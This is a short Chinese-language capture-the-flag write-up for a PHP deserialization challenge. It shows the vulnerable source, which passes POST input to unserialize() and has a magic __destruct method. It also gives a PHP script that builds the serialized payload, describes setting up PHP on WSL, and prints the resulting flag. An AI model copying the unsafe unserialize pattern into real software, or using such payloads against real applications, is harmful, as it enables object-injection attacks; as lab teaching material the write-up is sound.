1 通过post参数提交反序列信息

2 题目

http://192.168.1.8/fxl1/fxl1.php

<?php
highlight_file(__FILE__);class ezUnserialize{public $key;public function __destruct(){if($this->key == "FLAG"){include('flag.php');echo $flag;}}
}
unserialize($_POST['a']);
?>

3 EXP

<?php
<?php
class ezUnserialize{public $key;public function __construct($a){$this->key = $a;}
}
$obj = new ezUnserialize("FLAG");
echo serialize($obj);
?>

4 解题过程

4.0.1 在wsl的ubuntu上安装php环境

Step 1: Remove Existing PHP Versions
First, let’s clean up any existing PHP 7.x installations:sudo apt-get purge php7.*
sudo apt-get autoclean
sudo apt-get autoremove
Note about these commands:autoclean removes obsolete package files from your cache
autoremove removes dependencies that are no longer needed
Using purge removes both packages and their configuration files
Step 2: Add the PHP Repository
Ondřej Surý maintains up-to-date PHP packages for Ubuntu:sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
Step 3: Install PHP 7.3
Now install PHP 7.3 and common extensions:sudo apt-get install php7.3
Step 4: Configure Apache (if using Apache)
If you’re using Apache as your web server:# Disable old PHP module (if any)
sudo a2dismod php7.0  # or whatever version you had before# Enable PHP 7.3
sudo a2enmod php7.3
sudo systemctl restart apache2

4.0.2 /var/www/html配置普通账户可读可写可执行权限

(base) gpu3090@DESKTOP-8IU6393:~$ chown  gpu3090 /var/www/html
chown: changing ownership of '/var/www/html': Operation not permitted
(base) gpu3090@DESKTOP-8IU6393:~$ sudo chown  gpu3090 /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ ls
M5-应用集成  anaconda3  cookies.txt  downloads  snap  summaries  tmpg00x95ve.mp3
(base) gpu3090@DESKTOP-8IU6393:~$

4.0.3 将题目代码和flag存放到/var/www/html/相应的位置

4.1 在vscode上运行上面的exp的php脚本

需要安装插件php debug 和php Server

4.2 vscode运行exp 的php脚本

4.3 通过hackbar的post功能提交

4.得到flag

flag{EzUns3ri4liZe_1s_g00d}